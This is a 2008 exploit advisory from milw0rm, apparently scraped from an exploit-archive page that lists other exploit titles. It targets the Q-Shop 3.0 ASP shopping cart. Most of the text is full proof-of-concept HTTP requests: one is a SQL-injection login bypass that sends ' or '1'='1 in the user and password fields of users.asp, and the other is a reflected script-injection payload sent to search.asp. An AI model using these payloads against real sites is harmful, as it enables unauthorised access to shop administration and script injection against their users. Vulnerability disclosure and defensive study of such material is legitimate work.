
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
104 lines
3.3 KiB
Text
Executable file
104 lines
3.3 KiB
Text
Executable file
000000 00000 0000 0000 000 00 000000 0000000 0000 000000 00000
|
|
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
|
|
0 0 0 0 00 0 0 0 0 0 0 0 0 00 0 0 0 0 0
|
|
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
|
|
00000 0 0 0 0 0 0 0 0 00000 0000 0 0 0 0 00000 0 0
|
|
0 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 0 0 0 0 0
|
|
0 0 0 0 000 0 0 0 0 0 0 0 000 0 0 0 0
|
|
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
|
|
000000 0000000 000 0000 000 00 000000 0000000 000 000 00 00000
|
|
|
|
|
|
|
|
[+] Script : Q-Shop v 3.0 (Maybe prior versions also)
|
|
|
|
[+] Exploit Type : Multiple Exploits (XSS + Remote Login Bypass)
|
|
|
|
[+] Script's Homepage : http://quadcomm.com/qshop/
|
|
|
|
[+] Script's Description : ('Q-Shop is a fully featured shopping system including: full catalog browsing system, Shopping cart, User purchase history generation, web based catalog administration, web based order administration, web based user management and many more features. Supports MS Access and MS SQL Server. Full ASP source code included.')
|
|
|
|
[+] Script's Price : $249 USD
|
|
|
|
|
|
--//--> Exploit :
|
|
|
|
1) Remote login bypass :
|
|
|
|
http://[website]/[script]/users.asp
|
|
|
|
PoC :
|
|
|
|
Host: www.[website].cc
|
|
User-Agent: Blackness Lynx/1.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
|
|
Accept-Encoding: gzip,deflate
|
|
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
|
|
Keep-Alive: 300
|
|
Connection: keep-alive
|
|
Referer: http://www.[website].cc/[script]/users.asp
|
|
Cookie: ASPSESSIONIDACADTDQS=KPALCBJDEKLJOPFDAGIFIFBJ
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 66
|
|
|
|
UserID=%27+or+%271%27%3D%271&Pwd=%27+or+%271%27%3D%271&Login=[ok]
|
|
|
|
HTTP/1.x 200 OK
|
|
Cache-Control: private
|
|
Date: Sat, 15 Nov 2008 19:58:02 GMT
|
|
Content-Length: 31227
|
|
Content-Type: text/html
|
|
Server: Microsoft-IIS/6.0
|
|
X-Powered-By: ASP.NET
|
|
|
|
In simple words :
|
|
|
|
|
|
userID = ' or '1'='1
|
|
|
|
Pwd = ' or '1'='1
|
|
|
|
|
|
2) Remote XSS exploit :
|
|
|
|
|
|
|
|
PoC :
|
|
|
|
http://[website]/[script]/search.asp
|
|
|
|
POST /q-shop/search.asp HTTP/1.1
|
|
Host: [website]
|
|
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.4) Gecko/2008102920 Firefox 3.0.3
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
|
|
Accept-Encoding: gzip,deflate
|
|
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
|
|
Keep-Alive: 300
|
|
Connection: keep-alive
|
|
Referer: http://[website]/[script]/search.asp
|
|
Cookie: ASPSESSIONIDACADTDQS=KPALCBJDEKLJOPFDAGIFIFBJ
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 130
|
|
srkeys=%3Cscript%3Ealert%28%27Bl%40ckbe%40rD+is+not+yet+%21%27%29%3C%2Fscript%3E&Criteria=OR&CATS=ALL&x=8&y=18&MinPrice=&MaxPrice=
|
|
|
|
HTTP/1.x 200 OK
|
|
Cache-Control: private
|
|
Date: Sat, 15 Nov 2008 20:08:01 GMT
|
|
Content-Length: 66513
|
|
Content-Type: text/html
|
|
Server: Microsoft-IIS/6.0
|
|
X-Powered-By: ASP.NET
|
|
|
|
|
|
In simple words :
|
|
|
|
http://[website]/[script]/search.asp
|
|
|
|
POST data : srkeys=<script>alert('Bl@ckbe@rD is not dead yet')</script>
|
|
|
|
|
|
[Peace xD ]
|
|
|
|
# milw0rm.com [2008-11-17]
|